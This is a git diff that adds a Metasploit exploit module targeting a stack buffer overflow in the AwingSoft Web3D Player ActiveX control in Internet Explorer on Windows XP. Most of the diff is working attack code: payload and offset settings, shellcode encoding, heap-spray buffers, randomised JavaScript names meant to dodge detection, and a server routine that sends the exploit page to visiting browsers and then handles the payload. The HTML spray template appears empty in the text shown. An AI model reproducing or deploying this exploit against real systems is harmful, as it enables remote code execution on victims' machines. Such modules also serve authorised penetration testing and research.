diff --git a/modules/exploits/windows/browser/awingsoft_web3d_bof.rb b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb new file mode 100644 index 0000000000..1fa237d4ae --- /dev/null +++ b/modules/exploits/windows/browser/awingsoft_web3d_bof.rb @@ -0,0 +1,126 @@ +### +## This file is part of the Metasploit Framework and may be subject to +## redistribution and commercial restrictions. Please see the Metasploit +## Framework web site for more information on licensing and terms of use. +## http://metasploit.com/framework/ +### + +## +# awingsoft_web3d_bof.rb +# +# AwingSoft Web3D Player 'SceneURL()' Buffer Overflow exploit for the Metasploit Framework +# +# Tested successfully on the following platforms: +# - Internet Explorer 6, Windows XP SP2 +# - Internet Explorer 7, Windows XP SP3 +# +# WindsPly.ocx versions tested: +# - 3.5.0.0 +# +# Trancer +# http://www.rec-sec.com +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'AwingSoft Web3D Player SceneURL() Buffer Overflow', + 'Description' => %q{ + This module exploits a stack-based buffer overflow within Winds3D Viewer of + AwingSoft Awakening 3.0 (WindsPly.ocx v3.5.0.0). This ActiveX is a plugin of + AwingSoft Web3D Player. + By setting an overly long value to 'SceneURL()', an attacker can overrun a buffer + and execute arbitrary code. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'shinnai ', # Original exploit [see References] + 'Trancer ' # Metasploit implementation + ], + 'Version' => '$Revision:$', + 'References' => + [ + [ 'URL', 'http://www.milw0rm.com/exploits/9116' ], + [ 'URL', 'http://www.shinnai.net/xplits/TXT_nsGUdeley3EHfKEV690p.html' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00\x09\x0a\x0d'\\", + 'StackAdjustment' => -3500, + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C, 'Offset' => 8704 } ] + ], + 'DisclosureDate' => 'Jul 10 2009', + 'DefaultTarget' => 0)) + end + + def on_request_uri(cli, request) + + # Re-generate the payload + return if ((p = regenerate_payload(cli)) == nil) + + # Encode the shellcode + shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) + + # Setup exploit buffers + nops = Rex::Text.to_unescape([target.ret].pack('V')) + ret = Rex::Text.uri_encode([target.ret].pack('L')) + blocksize = 0x40000 + fillto = 500 + offset = target['Offset'] + + # Randomize the javascript variable names + winds3d = rand_text_alpha(rand(100) + 1) + j_shellcode = rand_text_alpha(rand(100) + 1) + j_nops = rand_text_alpha(rand(100) + 1) + j_ret = rand_text_alpha(rand(100) + 1) + j_headersize = rand_text_alpha(rand(100) + 1) + j_slackspace = rand_text_alpha(rand(100) + 1) + j_fillblock = rand_text_alpha(rand(100) + 1) + j_block = rand_text_alpha(rand(100) + 1) + j_memory = rand_text_alpha(rand(100) + 1) + j_counter = rand_text_alpha(rand(30) + 2) + j_buf = rand_text_alpha(offset) + + html = %Q| + + +| + + print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...") + + # Transmit the response to the client + send_response(cli, html, { 'Content-Type' => 'text/html' }) + + # Handle the payload + handler(cli) + end +end